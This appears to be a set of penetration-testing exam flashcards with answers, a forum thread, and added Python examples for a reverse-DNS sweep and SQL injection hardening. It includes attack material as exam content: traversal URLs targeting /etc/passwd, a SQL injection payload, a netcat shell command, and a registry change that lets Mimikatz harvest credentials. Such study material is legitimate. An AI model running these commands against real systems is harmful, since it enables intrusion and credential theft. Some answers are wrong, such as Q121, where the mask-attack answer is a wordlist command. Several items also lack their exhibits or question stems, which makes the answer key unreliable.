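Added example for Q87 (not part of the flashcards). `dig -x` reverses the octets of an address, appends in-addr.arpa and asks for a PTR record; a sweep is just that query repeated across a range. The script below builds the query name with the standard library and walks a CIDR block. The resolver is injectable so the sweep can run offline against constructed data; by default it uses the system resolver, which is what `dig` does when no server is given. The network and hostnames in the test are made up.

```python
import ipaddress
import socket


def ptr_name(ip):
    """The reverse-zone name a PTR query carries (what `dig -x` builds for you)."""
    return ipaddress.ip_address(ip).reverse_pointer


def system_resolver(ip):
    """Ask the OS resolver for the PTR record; None when there is no record or no DNS."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror, OSError):
        return None


def reverse_sweep(network, resolver=system_resolver):
    """Reverse-resolve every host address in `network` (CIDR or single IP).

    Returns {ip: hostname} for the addresses that have a PTR record. `resolver`
    is injectable so the sweep can be exercised offline against canned data.
    """
    net = ipaddress.ip_network(network, strict=False)
    hosts = [net.network_address] if net.num_addresses == 1 else net.hosts()
    found = {}
    for host in hosts:
        name = resolver(str(host))
        if name:
            found[str(host)] = name
    return found


if __name__ == "__main__":
    print(ptr_name("192.168.1.10"))          # 10.1.168.192.in-addr.arpa
    for ip, name in reverse_sweep("192.168.1.0/24").items():
        print(ip, name)
```

Note that the loop in option C walks 192.168.$x.$x, so it touches one address per /24 rather than a whole subnet; the function above iterates the full range. Reverse DNS also only reveals what the target's administrators chose to publish, so an empty result is not proof that an address is unused.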

88
Q

After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms?

A. Expand the password length from seven to 14 characters.

B. Implement password history restrictions.

C. Configure password filters.

D. Disable the accounts after five incorrect attempts.

E. Decrease the password expiration window.

A

C. Configure password filters.

89
Q

In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

A. Common libraries

B. Configuration files

C. Sandbox escape

D. ASLR bypass

A

A. Common libraries

100%

90
Q

Which of the following are MOST important when planning for an engagement? (Select TWO).

A. Goals/objectives

B. Architectural diagrams

C. Tolerance to impact

D. Storage time for a report

E. Company policies

A

A. Goals/objectives

C. Tolerance to impact

100%

91
Q

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output:

Which of the following is the tester intending to do?

A. Horizontally escalate privileges.

B. Scrape the page for hidden fields.

C. Analyze HTTP response code.

D. Search for HTTP headers.

A

B. Scrape the page for hidden fields.

100%

92
Q

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?

A. Sample SOAP messages

B. The REST API documentation

C. A protocol fuzzing utility

D. An applicable XSD file

A

D. An applicable XSD file

100%

93
Q

A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?

A. Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.

B. Identify the issues that can be remediated most quickly and address them first.

C. Implement the least impactful of the critical vulnerabilities’ remediations first, and then address other critical vulnerabilities

D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time.

A

D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time

100%

94
Q

Which of the following tools is used to perform a credential brute force attack?

A. Hydra

B. John the Ripper

C. Hashcat

D. Peach

A

A. Hydra

100%

95
Q

DRAG DROP -
A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = “Administrator”
The tester suspects it is an issue with string slicing and manipulation. Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment. Options may be used once or not at all.
Select and Place:


A

100%

96
Q

A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?

A. Ensure the scanner can make outbound DNS requests.

B. Ensure the scanner is configured to perform ARP resolution.

C. Ensure the scanner is configured to analyze IP hosts.

D. Ensure the scanner has the proper plug -ins loaded.

A

A. Ensure the scanner can make outbound DNS requests.

97
Q

Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

A. LSASS

B. SAM database

C. Active Directory

D. Registry

A

A. LSASS

100%

98
Q

A recently concluded penetration test revealed that a legacy web application is vulnerable to SQL injection. Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not in a position to risk the availability on the application. Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Choose two.)

A. Identify and eliminate inline SQL statements from the code.

B. Identify and eliminate dynamic SQL from stored procedures.

C. Identify and sanitize all user inputs.

D. Use a whitelist approach for SQL statements.

E. Use a blacklist approach for SQL statements.

F. Identify the source of malicious input and block the IP address.

A

C. Identify and sanitize all user inputs

D. Use a whitelist approach for SQL statements

100%
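
Added example for Q98 (not from the flashcards): the legacy inline-SQL lookup next to the two short-term controls the card names, an input allow-list (C) and a whitelist for the parts of a statement that cannot be bound (D), with the value itself passed as a bound parameter. It uses sqlite3 from the standard library with a constructed in-memory table; the table, column names and the `accounts` schema are assumptions for the example.

```python
import re
import sqlite3

# Only these identifiers may ever be spliced into SQL text (identifiers cannot be bound).
ALLOWED_SORT_COLUMNS = {"id", "name", "balance"}
# Allow-list for the one free-text input: a login name is letters, digits, dot, dash, underscore.
NAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")


def setup_db():
    """Constructed in-memory table standing in for the legacy application's data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (id INTEGER, name TEXT, balance REAL)")
    db.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                   [(1, "alice", 100.0), (2, "bob", 250.0), (3, "carol", 75.0)])
    return db


def lookup_vulnerable(db, name):
    """The legacy pattern: user input concatenated straight into inline SQL."""
    sql = f"SELECT id, name, balance FROM accounts WHERE name = '{name}'"
    return db.execute(sql).fetchall()


def validate_name(name):
    """Input sanitisation by allow-list: reject anything outside the expected alphabet."""
    if not NAME_RE.fullmatch(name):
        raise ValueError(f"rejected input {name!r}")
    return name


def lookup_hardened(db, name, sort_by="id"):
    """Bound parameter for the value plus an identifier whitelist for ORDER BY."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"rejected sort column {sort_by!r}")
    sql = f"SELECT id, name, balance FROM accounts WHERE name = ? ORDER BY {sort_by}"
    return db.execute(sql, (name,)).fetchall()


if __name__ == "__main__":
    db = setup_db()
    payload = "x' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, payload))   # every row comes back
    print("hardened:  ", lookup_hardened(db, payload))     # no account is literally named that
```

Both short-term controls are cheap to bolt on without touching the schema or the data layer, which is the point of the card: they narrow what an attacker can send while the architectural rewrite (options A and B) is scheduled. Blocking a source IP (F) does nothing about the next request from a different address.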

99
Q

During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests?

A. Ettercap

B. Tcpdump

C. Responder

D. Medusa

A

C. Responder

100%

100
Q

A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL: http://www.company-site.com/about.php?i=../../../../../etc/passwd
Which of the following attack types is MOST likely to be the vulnerability?

A. Directory traversal

B. Cross-site scripting

C. Remote file inclusion

D. User enumeration

A

A. Directory traversal

100%

101
Q

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

A. SNMP brute forcing

B. ARP spoofing

C. DNS cache poisoning

D. SMTP relay

A

A. SNMP brute forcing

100%

102
Q

A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).

A. Convert to JAR.

B. Decompile.

C. Cross-compile the application.

D. Convert JAR files to DEX.

E. Re-sign the APK.

F. Attach to ADB.

A

A. Convert to JAR.

B. Decompile.

100%

103
Q

DRAG DROP -
Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented. Each password may be used only once.
Select and Place:

A

104
Q

A consultant wants to scan all the TCP ports on an identified device. Which of the following Nmap switches will complete this task?

A. -p-

B. -p ALL

C. -p 1-65534

D. -port 1-65534

A

A. -p-

100%

105
Q

A penetration tester runs the following from a compromised host: python -c 'import pty; pty.spawn("/bin/bash")'. Which of the following actions is the tester taking?

A. Removing the Bash history

B. Upgrading the shell

C. Creating a sandbox

D. Capturing credentials

A

B. Upgrading the shell

100%

106
Q

A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?

A. RID cycling to enumerate users and groups

B. Pass the hash to relay credentials

C. Password brute forcing to log into the host

D. Session hijacking to impersonate a system account

A

A. RID cycling to enumerate users and groups

100%

107
Q

During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.
Which of the following registry changes would allow for credential caching in memory?

A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0

B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

A

D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

100%

108
Q

When performing compliance-based assessments, which of the following is the MOST important key consideration?

A. Additional rate

B. Company policy

C. Impact tolerance

D. Industry type

A

D. Industry type

100%

109
Q

During an internal network penetration test, a tester recovers the NTLM password hash for a user known to have full administrator privileges on a number of target systems. Efforts to crack the hash and recover the plaintext password have been unsuccessful.
Which of the following would be the BEST target for continued exploitation efforts?

A. Operating system: Windows 7 Open ports: 23, 161

B. Operating system: Windows Server 2016 Open ports: 53, 5900

C. Operating system: Windows 8.1 Open ports: 445, 3389

D. Operating system: Windows 8 Open ports: 514, 3389

A

C. Operating system: Windows 8.1 Open ports: 445, 3389

100%

110
Q

The following command is run on a Linux file system:
chmod 4111 /usr/bin/sudo
Which of the following issues may be exploited now?

A. Kernel vulnerabilities

B. Sticky bits

C. Unquoted service path

D. Misconfigured sudo

A

Don’t know the answer yet

111
Q

Given the Nikto vulnerability scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)

A. Arbitrary code execution

B. Session hijacking

C. SQL injection

D. Login credential brute-forcing

E. Cross-site request forgery

A

A. Arbitrary code execution

B. Session hijacking

Not 100%

mr_robot

4 months, 1 week ago

I would go for A and B. Cross-Site Tracing (XST) https://owasp.org/www-community/attacks/Cross_Site_Tracing https://capec.mitre.org/data/definitions/107.html Arbitrary code execution https://www.kb.cert.org/vuls/id/520827/

upvoted 3 times

mr_robot

3 months, 4 weeks ago

Maybe A and D? Arbitrary code execution https://www.kb.cert.org/vuls/id/520827/ Login credential brute-forcing https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d

upvoted 3 times

D1960

3 months, 2 weeks ago

Lines 6 and 15 suggest answers are: A. Arbitrary code execution D. Login credential brute-forcing The reason for D is line 6 XST or Cross-site tracing Except there is no XST answer However, XST can be used to steal credentials. Therefore, I guess the answers are: AD —- line 6: + OSVM-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST —- line 15: + /dvwa/7-s: PHP allows retrieval of the sorce code via -s parameter, and may allow command execution. u See http://www.kb.cert.org/vuls/id/520827 Reference: https://en.wikipedia.org/wiki/Cross-site_tracing

upvoted 1 times

D1960

3 months, 2 weeks ago

Then again, maybe AB? According to wikipedia, XST can be used to get cookies. Cookies can be used for session hijacking. “XST scripts exploit ActiveX, Flash, or any other controls that allow executing an HTTP TRACE request. The HTTP TRACE response includes all the HTTP headers including authentication data and HTTP cookie contents, which are then available to the script. In combination with cross domain access flaws in web browsers, the exploit is able to collect the cached credentials of any web site, including those utilizing SSL. “ https://en.wikipedia.org/wiki/Cross-site_tracing

upvoted 2 times

mr_robot

3 months ago

Agree with AB. https://owasp.org/www-community/attacks/Cross_Site_Tracing https://searchsoftwarequality.techtarget.com/definition/cross-site-tracing https://deadliestwebattacks.com/2010/05/18/cross-site-tracing-xst-the-misunderstood-vulnerability/

112
Q

A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?

A. Obtain staff information by calling the company and using social engineering techniques.

B. Visit the client and use impersonation to obtain information from staff.

C. Send spoofed emails to staff to see if staff will respond with sensitive information.

D. Search the internet for information on staff such as social networking sites.

A

D. Search the internet for information on staff such as social networking sites.

100%

113
Q

A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).

A. Cleartext exposure of SNMP trap data

B. Software bugs resident in the IT ticketing system

C. S/MIME certificate templates defined by the CA

D. Health information communicated over HTTP

E. DAR encryption on records servers

A

D. Health information communicated over HTTP

E. DAR encryption on records servers

100%

114
Q

A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

A. Transition the application to another port.

B. Filter port 443 to specific IP addresses.

C. Implement a web application firewall.

D. Disable unneeded services.

A

D. Disable unneeded services.

100%

115
Q

A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

A. TCP SYN flood

B. SQL injection

C. XSS

D. XMAS scan

A

A. TCP SYN flood

100%

116
Q

A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

A. Wait outside of the company’s building and attempt to tailgate behind an employee.

B. Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities, and attempt to gain access.

C. Use domain and IP registry websites to identify the company’s external netblocks and external facing applications.

D. Search social media for information technology employees who post information about the technologies they work with.

E. Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access.

A

C. Use domain and IP registry websites to identify the company’s external netblocks and external facing applications.

D. Search social media for information technology employees who post information about the technologies they work with.

117
Q

A penetration tester, who is not on the client’s network, is using Nmap to scan the network for hosts that are in scope. The penetration tester is not receiving any response on the command: nmap 100.100/1/0-125
Which of the following commands would be BEST to return results?

A. nmap -Pn -sT 100.100.1.0-125

B. nmap -sF -p 100.100.1.0-125

C. nmap -sV -oA output 100.100.10-125

D. nmap 100.100.1.0-125 -T4

A

I don’t know yet

118
Q

Given the following:
http://example.com/download.php?id=../../../etc/passwd
Which of the following BEST describes the above attack?

A. Malicious file upload attack

B. Redirect attack

C. Directory traversal attack

D. Insecure direct object reference attack

A

C. Directory traversal attack

119
Q

A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command: for m in {1..254..1}; do ping -c 1 192.168.101.$m; done
Which of the following BEST describes the result of running this command?

A. Port scan

B. Service enumeration

C. Live host identification

D. Denial of service

A

C. Live host identification

120
Q

A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5.
Which of the following commands will test if the VPN is available?

A. fpipe.exe -1 8080 -r 80 100.170.60.5

B. ike-scan -A -t 1 --sourceip=spoof_ip 100.170.60.5

C. nmap -sS -A -f 100.170.60.5

D. nc 100.170.60.5 8080 /bin/sh

A

B. ike-scan -A -t 1 --sourceip=spoof_ip 100.170.60.5

121
Q

A tester has captured a NetNTLMv2 hash using Responder. Which of the following commands will allow the tester to crack the hash using a mask attack?

A. hashcat -m 5600 -r rules/best64.rule hash.txt wordlist.txt

B. hashcat -m 5600 hash.txt

C. hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?a?a

D. hashcat -m 5600 -o results.text hash.txt wordlist.txt

A

A. hashcat -m 5600 -r rules/best64.rule hash.txt wordlist.txt

122
Q

Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a penetration test?

A. Penetration test findings often contain company intellectual property.

B. Penetration test findings could lead to consumer dissatisfaction if made public.

C. Penetration test findings are legal documents containing privileged information.

D. Penetration test findings can assist an attacker in compromising a system.

A

D. Penetration test findings can assist an attacker in compromising a system.

123
Q

An assessor begins an internal security test of the Windows domain internal.comptia.net. The assessor is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the following commands can the assessor use to find any likely Windows domain controllers?

A. dig -q any _kerberos._tcp.internal.comptia.net

B. dig -q any _lanman._tcp.internal.comptia.net

C. dig -q any _ntlm._tcp.internal.comptia.net

D. dig -q any _smtp._tcp.internal.comptia.net

A

A. dig -q any _kerberos._tcp.internal.comptia.net

124
Q

A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?

A. Run the application through a dynamic code analyzer.

B. Employ a fuzzing utility.

C. Decompile the application.

D. Check memory allocations.

A

C. Decompile the application.

125
Q

A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?

A. nmap -p 22 -iL targets

B. nmap -p 22 -sL targets

C. nmap -p 22 -oG targets

D. nmap -p 22 -oA targets

A

A. nmap -p 22 -iL targets

126
Q

A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?

A. The client has applied a hot fix without updating the version.

B. The threat landscape has significantly changed.

C. The client has updated their codebase with new features.

D. There are currently no known exploits for this vulnerability.

A

A. The client has applied a hot fix without updating the version.

127
Q

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?

A. ICS vendors are slow to implement adequate security controls.

B. ICS staff are not adequately trained to perform basic duties.

C. There is a scarcity of replacement equipment for critical devices.

D. There is a lack of compliance for ICS facilities.

A

B. ICS staff are not adequately trained to perform basic duties.

128
Q

For which of the following reasons does a penetration tester need to have a customer’s point-of-contact information available at all times? (Choose three.)

A. To report indicators of compromise

B. To report findings that cannot be exploited

C. To report critical findings

D. To report the latest published exploits

E. To update payment information

F. To report a server that becomes unresponsive

G. To update the statement of work

H. To report a cracked password

A

A. To report indicators of compromise

C. To report critical findings

F. To report a server that becomes unresponsive

129
Q

After performing a security assessment for a firm, the client was found to have been billed for the time the client’s test environment was unavailable. The client claims to have been billed unfairly. Which of the following documents would MOST likely be able to provide guidance in such a situation?

A. SOW

B. NDA

C. EULA

D. BPA

A

A. SOW

130
Q

Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO.)

A. The tester discovers personally identifiable data on the system.

B. The system shows evidence of prior unauthorized compromise.

C. The system shows a lack of hardening throughout.

D. The system becomes unavailable following an attempted exploit.

E. The tester discovers a finding on an out-of-scope system.

A

B. The system shows evidence of prior unauthorized compromise.

D. The system becomes unavailable following an attempted exploit.

131
Q

A. Credential dump attack

B. DLL injection attack

C. Reverse shell attack

D. Pass the hash attack

A

D. Pass the hash attack

132
Q

A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy:

Which of the following types of vulnerabilities is being exploited?

A. Forced browsing vulnerability

B. Parameter pollution vulnerability

C. File upload vulnerability

D. Cookie enumeration

A

A. Forced browsing vulnerability

133
Q

Given the following Python script:

Which of the following is where the output will go?

A. To the screen

B. To a network server

C. To a file

D. To /dev/null

A

A. To the screen

134
Q

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output:

Which of the following is the tester intending to do?

A. Horizontally escalate privileges.

B. Scrape the page for hidden fields.

C. Analyze HTTP response code.

D. Search for HTTP headers.

A

B. Scrape the page for hidden fields.
